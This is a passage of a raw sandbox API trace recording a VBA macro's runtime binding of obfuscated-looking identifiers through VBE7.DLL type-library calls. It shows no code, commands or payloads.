_Dst=0x144ca0, _DstSize=0x7, _Src="MA4DC_" | out: _Dst="MA4DC_") returned 0x0 [0069.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="MA4DC_") returned 7 [0069.761] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.761] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MA4DC_", lHashVal=0x106d6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.761] IUnknown:Release (This=0x665ba50) returned 0xd [0069.761] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.761] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MA4DC_", lHashVal=0x106d6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.761] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.761] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.761] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MA4DC_", lHashVal=0x106d6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.761] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.761] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.761] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MA4DC_", lHashVal=0x106d6a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.761] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81dfa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MA4DC_") returned 7 [0069.761] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MA4DC_", lHashVal=0x106d6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.761] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.761] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81dfa | out: _Dst=0x67c2d40) returned 0x0 [0069.761] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MA4DC_") returned 0x10e813 [0069.761] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_MA4DC_" | out: _Dst="_B_var_MA4DC_") returned 0x0 [0069.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_MA4DC_") returned 14 [0069.762] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.762] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MA4DC_", lHashVal=0x10e813, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.762] IUnknown:Release (This=0x665ba50) returned 0xd [0069.762] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.762] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MA4DC_", lHashVal=0x10e813, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.762] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.762] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.762] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MA4DC_", lHashVal=0x10e813, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.762] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.762] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.762] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MA4DC_", lHashVal=0x10e813, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.762] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.762] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.762] IUnknown:Release (This=0x665ba50) returned 0xd [0069.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87118e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_MA4DC_") returned 14 [0069.762] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MA4DC_", lHashVal=0x10e813, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x43004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x43004400000000, pDummy=0x0) returned 0x0 [0069.762] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81dfa | out: _Dst=0x144ec0) returned 0x0 [0069.762] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KACUAAxo", lHashVal=0x1012bd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e22, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KACUAAxo") returned 9 [0069.762] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KACUAAxo", lHashVal=0x1012bd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e22, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KACUAAxo") returned 9 [0069.762] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KACUAAxo", lHashVal=0x1012bd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.762] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KACUAAxo") returned 0x1012bd [0069.763] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="KACUAAxo" | out: _Dst="KACUAAxo") returned 0x0 [0069.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="KACUAAxo") returned 9 [0069.763] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.763] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KACUAAxo", lHashVal=0x1012bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.763] IUnknown:Release (This=0x665ba50) returned 0xd [0069.763] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.763] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KACUAAxo", lHashVal=0x1012bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.763] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.763] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.763] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KACUAAxo", lHashVal=0x1012bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.763] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.763] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.763] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KACUAAxo", lHashVal=0x1012bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.763] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81e22, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="KACUAAxo") returned 9 [0069.763] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KACUAAxo", lHashVal=0x1012bd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.763] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.763] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81e22 | out: _Dst=0x67c2d40) returned 0x0 [0069.763] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KACUAAxo") returned 0x10ea85 [0069.763] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_KACUAAxo" | out: _Dst="_B_var_KACUAAxo") returned 0x0 [0069.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_KACUAAxo") returned 16 [0069.763] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.763] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KACUAAxo", lHashVal=0x10ea85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.763] IUnknown:Release (This=0x665ba50) returned 0xd [0069.763] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.763] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KACUAAxo", lHashVal=0x10ea85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.763] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.763] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.763] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KACUAAxo", lHashVal=0x10ea85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.764] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.764] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.764] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KACUAAxo", lHashVal=0x10ea85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.764] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.764] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.764] IUnknown:Release (This=0x665ba50) returned 0xd [0069.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8711be, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_KACUAAxo") returned 16 [0069.764] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KACUAAxo", lHashVal=0x10ea85, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.764] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81e22 | out: _Dst=0x144ec0) returned 0x0 [0069.764] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.764] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.764] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.764] IUnknown:Release (This=0x665ba50) returned 0xd [0069.764] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.764] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.764] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.764] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.764] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.764] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.764] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.764] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.764] IUnknown:Release (This=0x665ba50) returned 0xd [0069.764] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.765] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.765] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.765] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.765] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.765] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.765] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.765] IUnknown:Release (This=0x665ba50) returned 0xd [0069.765] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.765] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.765] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.765] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.765] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.765] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.765] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.765] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.765] IUnknown:Release (This=0x665ba50) returned 0xd [0069.765] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.765] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.766] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.766] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.766] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.766] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.766] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.766] IUnknown:Release (This=0x665ba50) returned 0xd [0069.766] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.766] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.766] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.766] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.766] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.766] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.766] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.766] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.766] IUnknown:Release (This=0x665ba50) returned 0xd [0069.766] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.766] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.767] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.767] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.767] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.767] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.767] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.767] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.767] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.767] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.767] IUnknown:Release (This=0x665ba50) returned 0xd [0069.767] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.767] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.767] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.767] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.767] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.767] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.767] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.767] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.767] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.767] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.767] IUnknown:Release (This=0x665ba50) returned 0xd [0069.767] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.768] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.768] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d7e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jD4AGZx") returned 8 [0069.768] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jD4AGZx", lHashVal=0x10b8e3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d7e, 